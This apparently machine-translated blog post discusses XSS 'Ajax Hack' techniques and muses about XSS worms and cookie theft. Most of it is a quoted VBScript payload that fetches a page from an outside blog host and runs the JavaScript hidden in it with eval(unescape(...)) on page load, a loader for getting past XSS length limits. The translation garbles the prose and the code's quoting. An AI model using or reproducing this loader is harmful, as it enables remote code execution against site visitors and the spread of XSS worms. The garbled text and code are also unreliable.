Today, I saw an Ajax Hack demonstration on my dream BLOG. In fact, cross-site discovery is very easy, but it is still very difficult to do big harm. Secretly COOKIE is only for users, the use of xss worm is terrible.
Let's take a look at his VBSCRIPT script.
Copy codeThe Code is as follows: vbscript: execute ("
Dim l, s:
L = chr (13) + chr (10 ):
S = "" sub mycode "" & l:
S = s & "" dim http, url, pg, p, p2, cd, ht, o "" & l:
S = s & "" url = "http://hi.baidu.com/monyer/blog/item/83b70ed71b5095dda044df67.html" & l:
S = s & "" set http = createobject ("Microsoft. XMLHTTP") "" & l:
S = s & "" http. open "get", url, false "" & l:
S = s & "" http. send (")" "& l:
S = s & "" pg = http. responseText "" & l:
S = s & "" p = instr (1, pg, "ILOVEUNING-BEGIN") "" & l:
S = s & "" if p = null or p <1 then exit sub "" & l:
S = s & "" p = instr (p, pg, chr (37) "" & l:
S = s & "" if p = null or p <1 then exit sub "" & l:
S = s & "" p2 = instr (p, pg, chr (60) "" & l:
S = s & "" cd = mid (pg, p, p2-p) "" & l:
S = s & "" ht = "eval (unescape ('" & cd & ")" & l:
S = s & "" window.exe cScript ht, "jscript" & l:
S = s & "" end sub "" & l:
Execute (s ):
Document. body. onload = getref ("" mycode ""):
")
Call code in http://hi.baidu.com/monyer/blog/item/83b70ed71b5095dda044df67.html
In this way, the code called on this site is implemented. In other words, whether or not this solves the problem of data submission restrictions commonly used by Ajax Hack (the cross-site submission has no permission and the XSS code length limit ~ I have no experiments here.
Another idea is to write the script to the yundun shard before eval ~ By combining these two ideas, we may be able to create a miracle in the harsh XSS vulnerability!